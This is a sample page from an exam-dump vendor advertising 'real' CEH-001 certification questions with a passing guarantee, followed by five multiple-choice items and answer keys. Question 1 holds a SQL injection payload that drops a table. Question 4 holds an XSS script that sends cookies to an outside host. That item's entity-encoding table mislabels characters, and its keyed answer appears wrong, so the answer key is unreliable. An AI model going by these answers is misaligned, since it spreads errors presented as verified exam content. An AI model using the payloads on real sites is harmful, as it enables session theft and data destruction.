

CEH-001^{Q&As}

Certified Ethical Hacker (CEH)





Pass GAQM CEH-001 Exam with 100% Guarantee

Free Download Real Questions & Answers **PDF** and **VCE** file from:

<https://www.leads4pass.com/ceh-001.html>

100% Passing Guarantee
100% Money Back Assurance

Following Questions and Answers are all new published by GAQM
Official Exam Center

-  **Instant Download** After Purchase
-  **100% Money Back** Guarantee
-  **365 Days** Free Update
-  **800,000+** Satisfied Customers



QUESTION 1

What will the following command produce on a website's login page if executed successfully? `SELECT email, passwd, login_id, full_name FROM members WHERE email = 'someone@somewhere.com'; DROP TABLE members; --'`

- A. This code will insert the someone@somewhere.com email address into the members table.
- B. This command will delete the entire members table.
- C. It retrieves the password for the first user in the members table.
- D. This command will not produce anything since the syntax is incorrect.

Correct Answer: B

QUESTION 2

Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the Department of Defense's front end Exchange Server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password.

What tool would be best used to accomplish this?

- A. SMBCrack
- B. SmurfCrack
- C. PSCrack
- D. RainbowTables

Correct Answer: D

QUESTION 3

An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS? Select the best answer.

- A. Firewall
- B. Manhunt
- C. Fragrouter
- D. Fragids

Correct Answer: C

QUESTION 4

XSS attacks occur on Web pages that do not perform appropriate bounds checking on data entered by users. Characters like that mark the beginning/end of a tag should be converted into HTML entities.

```
<      &lt;
>      &gt;
{      &#40;
}      &#41;
#      &#35;
&      &amp;
"      &quot;
```

```
<script>
var x = new Image(); x.src =
'http://www.juggyboy.com/x.php?steal=' + document.cookie;
</script>
```

What is the correct code when converted to html entities?

- A. `&script>`
`var x = new Image(); x.src =`
`"http://www.juggyboy.com/x.php?steal=" + document.cookie;`
`&/script>`
- B. `&script#`
`var x = new Image(); x.src =`
`"http://www.juggyboy.com/x.php?steal=" +`
`document.cookie;`
`&/script#`
- C. `>script>`
`var x = new Image(); x.src =`
`"http://www.juggyboy.com/x.php?steal=" +`
`document.cookie;`
`</script>`
- D. `<:script>`
`var x = new image(); x.src =`
`"http://www.juggyboy.com/x.php?steal=" + document.cookie;`
`</script>`

- A. Option A
- B. Option B
- C. Option C
- D. Option D

Correct Answer: D

QUESTION 5

Attackers target HINFO record types stored on a DNS server to enumerate information. These are information records and potential source for reconnaissance. A network administrator has the option of entering host information specifically the CPU type and operating system when creating a new DNS record. An attacker can extract this type of information easily from a DNS server.

Which of the following commands extracts the HINFO record?

- A. `c:> nslookup`
`> Set type=hinfo`
`> certhack-srv`
Server: dns.certifiedhacker.com
Address: 10.0.0.4
sales.certifiedhacker.com CPU = Intel Quad Chip OS=Linux 2.8
dns.certifiedhacker.com Internet address = 10.0.0.56
- B. `c:> nslookup`
`> Set dns=hinfo`
`> certhack-srv`
Server: dns.certifiedhacker.com
IP: 10.0.0.4
sales.certifiedhacker.com CPU = Intel Quad Chip OS=Linux 2.8
dns.certifiedhacker.com Internet address = 10.0.0.56
- C. `c:> nslookup`
`> Set record=hinfo`
`> certhack-srv`
host: dns.certifiedhacker.com
Address: 10.0.0.4
sales.certifiedhacker.com CPU = Intel Quad Chip OS=Linux 2.8
dns.certifiedhacker.com Internet address = 10.0.0.56
- D. `c:> nslookup`
`> Configure type=hinfo`
`> certhack-srv`
Host: dns.certifiedhacker.com
IP: 10.0.0.4
sales.certifiedhacker.com CPU = Intel Quad Chip OS=Linux 2.8
dns.certifiedhacker.com Internet address = 10.0.0.56

A. Option A

B. Option B

C. Option C

D. Option D

Correct Answer: A